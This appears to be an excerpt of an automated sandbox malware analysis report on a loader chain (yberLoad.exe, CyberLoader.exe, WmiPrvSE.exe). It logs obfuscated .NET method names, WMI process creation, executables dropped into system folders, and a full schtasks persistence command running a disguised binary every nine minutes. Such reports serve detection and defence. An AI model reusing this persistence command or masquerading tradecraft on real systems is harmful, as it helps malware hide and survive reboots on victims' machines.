            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, mPMkQ3zYpVw3JwRCDH.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'WkDVYrKWl03WjFSwt5c', 'AGJqG5KbO6byf9nep1I', 'Srl7UAKBZ2sLpxulX1G', 'eRQCPwKKhxAw3BZeiV7', 'UUg4ZiKdmEdxwCuKSeU', 'OgQTFNKlf8boMjoSFs7'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, cgYdKBS4dfIqsoQc3K5.csHigh entropy of concatenated method names: 'WiNdBOcGCk', 'nDBdf4KO3b', 'D3odtTduE3', 'HJjdKmLms8', 'JifdnOD8iU', 'tnsdIAv4Ea', '_838', 'vVb', 'g24', '_9oL'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, KoYvRPXDpZNlby5oifZ.csHigh entropy of concatenated method names: 'CIr9MsrGD7', 'sSwwZ8OoXU9WmpRifFW', 'PIqi86OfBxNduH1eSLy', 'SScm69OIBPqwTKUhOWQ', 'RKULqVO44XbsxZO7lY3', 'CAn0DUO0vUnMculjmHW', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, YxLmcwSftaSD6AouxaL.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'TueT0Mf4jF', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, enmPnwXoGiCuspBWBNY.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'Qsi06alDYnW8eYMubvB', 'Wnb3EWlFHQSR4jA2sW9', 't89tQrlV5oPV6Bgy4mm', 'PoeUA6lPKhngXND4pxF', 'NQk3oolsmtEexl05MwE', 'PfCIUcl990jIF12ions'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, kgPkwBr8bdwvaWD0v8u.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'KiKcgReITf', 'DugcvBN4BQ', 'r8j', 'LS1', '_55S'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, KrWQ7eXXPBxwnTw3oFq.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'C5LDnrKJWthC6Fo9NQA', 'dwb3KYKpJe1BCxaIWH6', 'mB3JiXKR0RlQMVjpxnH', 'lwsOevK7655smRFHba9', 'ARRYlgKZMctIEkNvZXb', 'dInr8OKi467OIjevtEX'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, vSaN0vg8DC3aM7W5GD.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'Jelj6MbUCUUoh2XGFLG', 'i6lZaabnCh681SCiIiy', 'W3CIiybmyypXetZNaBH', 'JZrV6rbLj3eIuklogpU', 'rOxPgXbQ3NfeTBXHHdi', 'kxjNk7b8kcwgap3gBG0'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, B1mRmjpjsCFHiAuYNWK.csHigh entropy of concatenated method names: 'uKIq8aAZURI7HVwtyVq', 'kY97NoAiv66119PCQmh', 'cYEQbZAROCsw5qyPqlv', 'GEya8dA7ta06upGaGLs', 'eVEh0QAuhB', 'fLEuRsAGCTAa1R0Eqp0', 'bYxd7KArx53Z1CjoKB6', 'FfdJ6rA57pb824wR3Vk', 'V0etw1AMtGtwI3FaVWQ', 'LIB5WeAtPeX94xWlgY7'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, qgo3QESh9fC1e7kyOsT.csHigh entropy of concatenated method names: 'O50ThZgwmT', 'SdWTasDydX', 'HMuTPFXcaa', 'zy5TQ48gqS', 'oxBTprZmaX', 'kxL4UJC6QeS7ch4To1i', 'F4ji17ChSwT3asO5VxJ', 'qZHrUfCwvQgsvHqduU2', 'AoEt5rCzEBPaC0AsV8n', 'hLLYNEucKcNAd8Pwyd6'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, OsAeTLjTbLP5h5sZLNQ.csHigh entropy of concatenated method names: 'KbDFglwsN2', 'V14FvZgXOU', 'TAuFytsecI', 'kPwQBf7SfZo9on5Gwak', 'uTk5nu7upfdTav3LGqd', 'tdDtsr7ae2SBMLBtE39', 'RhPvIy7Tm9Aojf5DlJ5', 'wmMFUKknW4', 'sEeF63nZ9n', 'WM5F5Z1TTj'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, ka1QT6XfHRFlKQ5dtIf.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'FFbaCYlIvhOiMmvasSN', 'pKxe73l4MqX15LNAA3g', 'Ak4VveloPabwZa3hJJL', 'SVHRjolfZOwYap3YqOY', 'rj18Ncl0gopSqCbmNVL', 'FXoDt5lCgBwLe0R2bhR'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, gja0xVp0jOr8UFrS0qr.csHigh entropy of concatenated method names: 'ypqdqxA5Q8', 'ArSdJoo447', 'mpPdU7mcDl', 'IO0d6vuctS', 'Oiad5J0Oh7', 'jnYdFTp3Qs', 'CUYdOCFEp0', 'ywqd1eyZKm', 'RqSd4quAVw', 'v3rdW84PUJ'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, XFLHfgX5LYQdBveBiNn.csHigh entropy of concatenated method names: 'oyIkwmNXHe', 'sXSh5snKLNsPEUiCJ56', 'jteUpend1CkwNchZ8Q4', 'vXlKYanbBc28Ayu1omX', 'd2v3EsnBuf54qkb9VnE', 'KFAxt1nlk5YJBw6cWtm', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, m10G4Bj5DLkP5nsTMZF.csHigh entropy of concatenated method names: 'QC3mu45omwRga75l8NR', 'JeByXy5fyOcMRtOfE95', 'wAmLpj5IMfJFkxvAKw4', 'ydBNES54482wvt0e2Mf', 'IWF', 'j72', 'yDqOyRvo9l', 'mV1Oe80pY8', 'j4z', 'zfPO34E8qn'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, ikXsbRrNLq8kv9bXeKm.csHigh entropy of concatenated method names: '_7zt', 'mtrWwEUL34', 'lCVWhKQbxT', 'PBjWadAo3J', 'uqJWPYkdp3', 'kS9WQPCgtv', 'XGwWpaY788', 'gKC8sgGZvXnRiGqqq4Z', 'ngoNbxGibfmVufjloMW', 's0t5kDGRgvrnUBMd9Am'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, CkGeDBLNEiU2BYTDwj7.csHigh entropy of concatenated method names: 'ojRRz3tV1r', 'qrPq8FsKVL', 'klwq9WnVn3', 'VKDqkhULJx', 'kMAqRySW9u', 'JU0qqDJW3f', 'CO8qJLuFfS', 'yN4qUFnVCh', 'vcXq6A7WLH', 'WNAq5MCl1t'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, tUj7mBJkFE7TkaAB6p.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'KLlnoJvUfWk7GrJKs0s', 'GRQ6kkvnh9liauAy18u', 'aHDIs6vmfKlLYeNfG3J', 'i3iJgivLui0Th26sRRv', 'Un2BJYvQCBHEOcbiWY2', 'UNDtO9v84iRuL7dkLx1'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, TssIa7mRVYHa2ajOte.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'TWhN53xXJ', 'tf37qrvJvlkSvGcsHcW', 'V58rvXvpxOdnPtHVyvh', 'Ls5sQgvRoPpMaWDZyvF', 'TR3hVsv7NIhAGRZlM6n', 'shknxAvZvu56OOFeMXH'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, gSjerhrYRj0IqHNQlWY.csHigh entropy of concatenated method names: 'fBUW7UXVmX', 'OWUWovfwGZ', 'Q5hWDDfNUm', 'TQCWljsfat', 'J7JW2ZdPAD', 'gc5yZ8GIaVNfnhesr9u', 'J68RQuG4n5gRyCmb0aq', 'pxkUpYGA4IVkvlxwoKl', 'vBiUrdGyNBdKh1nuoZX', 'mq8Q5qGodaAwQyEZ928'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, KPjsuiXHJjMDhAdyBZ6.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'lecMYflc9wdyW58OAwe', 'YQ1YjPljMhHEUeal7ej', 'aJhAKMlvrqfcLG3oju6', 'bOLFX4lWgr14M7wEE7J', 'uamxZjlbWdFfyxVmjWB', 'hhXuCilBGcKcQ1fbTd6'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, fT7xiHXkgMAewVcs1js.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'nV5Ak8UeAbL55kDjHxA', 'BJ3O1oUAYlJYepAJtYo', 'BOUAdCUyvSYKAOV8PQ6', 'Ei3Q8gUIYFB3nlLxvXh', 'HHxrP3U4TSC6QSX4rKn', 'oF3J9NUofgfNweP7uZD'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, YqWhllXilZqqTURfcP8.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'AULg5xlwkSTRLq3N2Tj', 'NmrvAGlzJbPQMRba8vF', 'Nv84kn1cGEMgYd9EvfU', 'QTXpEK1jSYtBasfkZRX', 'dehJD21vPm3ddxorvxI', 'G9oHLP1W0NOr4Ek4QTd'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, KwkuQsnrDDRZOrc49w.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'Y5D6tobgDj6SjIv0pT3', 'ftDB6DbXcdo5qvJKiXT', 'ynluJ8bJSHAQtoEUAtS', 'JVNVfSbpdYiqCvWA8xZ', 'pyMo3HbRKQumbnLMEHl', 'VtL1vob7uwGNxE08u2F'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, r9NQLcjQ4S4tRBtMWv8.csHigh entropy of concatenated method names: 'O5V576Ikpx', 'tsO5oeekOX', 'y685DPkyDf', 'eqfeTZRQWb6Lq9oTIdi', 'QnFsM4RmpnBUTXDSLan', 'maAjXuRLLXFoInNsDE0', 'hduD07R8VXJ1ya9JBdU', 'wR55gKwLsR', 'kYy5vNr4gt', 'qiK5yaBqrb'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, LNqSJRrpuvPrmisgp80.csHigh entropy of concatenated method names: 'uBQ4y9wdC8', 'W6HFT1MXDpgsLlX7yEm', 'IXevCuMJ4FJaqXC8bFT', 'tVO8ixMkQ6C2Mmek9Ec', 'CHoGC8Mg38eAgnXiM2F', 'PdkOYXbyJ9', 'QBtOHxyGxg', 'I5IOXeosep', 'sZyO7mx5v3', 'qoyOoRbQ79'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, g24StbSURkZTRDV26oK.csHigh entropy of concatenated method names: 'thPmFoOBr2', 'A9cmOjUi9S', 'JQCm11jVjG', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'qyNm4Hfu9c'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, UhcJj1jvUtpYj8ivHc7.csHigh entropy of concatenated method names: '_269', '_5E7', 'TxRguCDG9j', 'Mz8', 'hDlgFT8MDd', 'MyjJYyisP0tkOwQW4JK', 'xerDxsi9DcJpVcaLVCi', 'fGaS2OiEYXRc1KItXvw', 'RGHZX4iHJ2DGtcX3p57', 'yCPenYi2QatsS8gG7Cx'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, pUwlfUSsyWh316T09pR.csHigh entropy of concatenated method names: 'VlilhMSbUpadU493Slx', 'ArKfbrSB0pUmw2AXkrG', 'HwLFffSvubLxgih8DEu', 'eOlq0HSW0uAs3ddc0Kc', 'ld5moUjVPo', 'WM4', '_499', 'WigmDXPf3N', 'vx7mlhKS1l', 'q4qm2OOLsx'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, N93O14X7uQAqdNr6VR6.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'Nf1g50URknK3HbtF5jf', 'VEce5SU7LtYC6OMB9km', 'q46ZQCUZTumS4nZGQgV', 'm0BteWUiMpvbIbFAAtv', 'pI2ERsU5UtKKThqkOGX', 'slZeKrUMo1txmveJkMw'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, BtnsQNvgrHLHdsMNod.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'Y5et4ABtPENRnY84a3k', 'mf9iTPBYlJKnb64boPk', 'SEg3RJBNgxoJ86nPnnb', 'FMQqPEBqP3DCuNAcpgv', 'ipiTwBBe5OasESIC6un', 'OjLT9NBAejEpPmfBoAY'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, sj3foALDPWq5JqbGKFm.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'H5FJooZ3bW', 'sV0JDLvM4I', 'oj0Jl53kEa', 'mlEJ2lBXmV', 'DnPJEfp02X', 'ppRwBng10E6NI31H0qa', 'ApnqN8gON7fcaKdmpIo', 'sJX2JhgdMNO6GsmvcGa'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, H0W9oJXObJcxu0R9ONO.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'iuBDP5d95m8fNW2bEwJ', 'bRRmEidEip8t7mSXqBO', 'jG3h4VdHUyQKc6KrrEb', 'kyYgsqd2tjtJBtiMNyb', 'IZqvEGd6yExvLRtEMhD', 'y5tOrMdh2VvdTNZkf7L'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, DX5BYbXqSZU82bMNyBr.csHigh entropy of concatenated method names: 'Eim9BylXUZ', 'h4LRC0OvOv8DAnbJmxv', 'ImIxuMOW4iPR8ShDKvi', 'DxSi6iOcLVMgrFEksKb', 'TK5EWMOjbDZMsMoa6Iq', 'yhNoq4ObbqZZ34K18qy', 'US8u1HOB1mDdvAtfoBm', 'ftXULsOKxy1MWtJoD3g', 'xg09t53Lt3', 'KkkU5gO16siycyvHxaA'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, qwNqFiplCuyw0sGBFiM.csHigh entropy of concatenated method names: 'rdx0VWfbrE', 'lCg0CvrNWB', 'yar0ufN2pr', 'yJB0LsNuDr', 'avq0Zqx1X8', 'sWV0MRGlWR', 'BvaapxoF9k4OtDVvnnL', 'zSrjxHoxH8jQXqqFB1a', 'uLf6ZSoD0hOJiBEN1bk', 'EYrjpgoVJJilV59RX9N'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, m6kMsfj7gno69nIFlW8.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'uPPgdaHgPt', '_168', 'VghF0HiM3LB3UqkXb4A', 'iMU4fViGXSRfEWZhjqT', 'BotCfOirmel0qBmQRwd', 'JH5Ukqit6vhVU45Y6tK', 'XLi5MkiYUGbg8DjufBW'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, pl6rQ4ribcymrIPI12X.csHigh entropy of concatenated method names: 'er3j7kskM8', 'uwKjoBToAf', 'oRcjDiFmNh', 'OjSjlqk2o7', 'r6Cj2aE81S', 'qfdIYMrJHbMnGRVQpMd', 'g74TZmrg59OkDURQLeW', 'n9CdMwrX7eaJXgOx18g', 'TFnT6ZrpuhdtBePP9Dl', 'uV38VbrRunHTCMBcRCW'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, j6wX7pLaCS6KBJjSSsU.csHigh entropy of concatenated method names: 'DgaRMw17c2', 'eWrRAmSUG0', 'kw6TbAQJwWITtE4n8Au', 'd6MyP2Qp1dY7xeILh7I', 'RXXhkbQRVUvNV758R65', 'gLpJ0gQ72hZd5y1SQVU', 'j46RTIQZwjXqYRBcfrG', 'ROjRHUQirl6IrZ8Qfpa', 'raZwdDQ5NyXvasShU2o', 'SMGr8qQMKrd90UoGlYV'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, qVh70sjVw7gHsCkMlvN.csHigh entropy of concatenated method names: 'I07r72qfVd', 'wksrzE7INt', 'LV4TXeZS6EnOjUVKUG5', 'mck8oJZTFgP4mg9aqj4', 'GqJgt7Zuyot0PmwWvpi', 'rif4iTZaMHJfdUsA61Y'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, TpMfnpjnKW9yL54ZJCe.csHigh entropy of concatenated method names: '_5u9', 'BDNgM0XqQU', 'uLPO8HAtC8', 's19g10ahAX', 'unjojCZ6NvXea6ueYfr', 'Rfd4VgZh9I5uAEHAKsq', 'AkfuCkZwsmm73ZWnSKf', 'FxeKHkZHBCeDZKciOoK', 'XtmmZaZ2WRba3B0LFvd', 'f1RclrZzGYCJYagelWu'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, G4lPjKpqdpWKcXmSUgV.csHigh entropy of concatenated method names: 'oaj0tqBueV', 'Dcf0Kbm6Vd', 'SlT0ntSDVB', 'cWgkNkoCT8TFPahOLcf', 'yLqKr4ofZ7qN7yFwyGw', 'OArU41o0wgqMehDJu9P', 'B3aj23ouWCKvZ7ZMxGZ', 'VJvEDAoaiuFBXgVMjS2', 'SQbMNNoShB49aSUStc1', 'BCDU9goTmxxKwpPb9rc'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, r3Z14Mp3uqEsPg35B5O.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, hbGMb8rvTCEkg2O1QcX.csHigh entropy of concatenated method names: 'qM6cMVjk02', 'nTJcoGSCOA', 'qUGcDbxLCM', 'pQ7clddyrH', 'ERYc2x1oXW', 'KLrcEgMCZJ', 'TvlcNauRf5', 'o7PcrFyxVf', 'aSEcbQkuGj', 'XJGcsRwvBI'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, FMvWEIr1aJOrakjK7ji.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, ztnhY6dPIAK90UlBhN.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'xlCt9fvhSFdDiAr6ffw', 'JeQfxGvwdDGmRoIYsXL', 'FxpqpNvza8kJyviGHS9', 'PiPlQvWcbmkf3UviFJm', 'yKVlKXWj2MEifHIMcyg', 'lVABW7WvcxqYJPjnNqq'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, bYjOIlrBU5WEKHelcwl.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'bm7j8GyLCr', '_3il', 'Chwj9xBunq', 'a3Rjkt8NGn', '_78N', 'z3K'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, T81Blj2iZt9vDroGKn.csHigh entropy of concatenated method names: 'OsgjgksEc', 'ddCB7mAwSjsEfcc09N', 'BIkaw8q75ZwCrn1HKY', 'dZlPlVeqPlsSAJPqcZ', 's8eeYGy5ha2LCUr3pS', 'OtF6s7IxotFwo5GYdn', 'wb8kZI2Sa', 'MEDRKtvt2', 'g4GqbQWCq', 'jCpJXVJV9'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, gRJknb7Bmh6JwVIFgi.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'mSWV9wBKx4ajyfP3NZK', 'Ses5a7BdZxCCAtfh2Wd', 'mRIjqIBlvvidSHuORjb', 'PIaKjOB1pUttK2myY6R', 'xrUgLTBOCHARAUq6jnp', 'Bic17EBU5exLxSlYn9b'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, poi4Dwpevfh1HQMbns1.csHigh entropy of concatenated method names: 'EbVd8AjPLW', 'B5x801o6W0VBbdLK4ti', 'rdvoe7oHFg4WBkTWjT2', 'bGPy0Ho2U6S8cMwLViB', 'PLJ4EXohOcNhrn4VO91', 'Fd6ZyXowULRr38wlLT3', 'h42CAmoz9sbAHYilDBx'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, nenBFjVvhCocUfRvUt.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'Yq9dOUW232cL62GjQtE', 'KH4KuxW6dOBsWtqwOnk', 'FKO9iKWh7LVNj84JDB4', 'rPtYQyWwM5AAvN9qAiF', 'rIl8oeWzIbpYi8mdaGU', 'CHT7oEbcKZxgSAW1ppV'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, Slr5CYjHBpTGlh87FtI.csHigh entropy of concatenated method names: 'ET95VoMoQj', 'a6d5C37BGB', 'iRI5uhRF81', 'KAJ5LtCp3o', 'xPH5ZntFTM', 'msBjs07KEditK3TCW4E', 'fHFSZx7dGaHEOEhNvQ1', 'GDPX2P7bKW0e7G7M6Le', 'I9xxsu7BbM4tgEkWyqW', 'xC4U6H7l9s6fDDMd97u'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, T0HDoS2uxaHqMCw3CHm.csHigh entropy of concatenated method names: 'aKD4coxGuPgiYLc47qL', 'EXltdnxrYH0rMWEXZ8H', 'tpbKjfx5iACMIFSL7Tk', 'u5yvHKxMuNLoaqHRRFF', 'YveHcYKbwt', 'vqodcPxNeDvsXx9jQsX', 'mFaiYHxqhHEFW2OANoy', 'Ff9k7Rxe9KLyeWVOlJ0', 'OCvG82xAfpK42itdTeu', 'KWbIsFxyjLgvsBoDu5E'
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, J2KsiTjrFVAL0hqr8gB.csHigh entropy of concatenated method names: 'tbO6btHREN', 'jvE6s039UC', 'kiF6xrmtFx', 'Xxu6BgCTCr', 'X6e6falVoT', 'QhC6tvLtPq', 'DHhRhTJYKTVhoYHggfU', 'iGI8LVJrR9UHP1SrePU', 'IZqB1uJtqSdj4Nyrbqh', 'EZLM1lJNIoTEoyUPXlW'

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeFile created: C:\Users\user\AppData\Local\Temp\CyberLoader.exeJump to dropped file
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile created: C:\Recovery\zufsVvjyWcGfJF.exeJump to dropped file
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeFile created: C:\Users\user\AppData\Local\Temp\ yberLoad.exeJump to dropped file
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile created: C:\Users\Default\Downloads\WmiPrvSE.exeJump to dropped file
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeFile created: C:\Users\user\AppData\Local\Temp\MVPLoader.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeFile created: C:\msPortRefnetdhcp\componentWininto.exeJump to dropped file
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /f
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
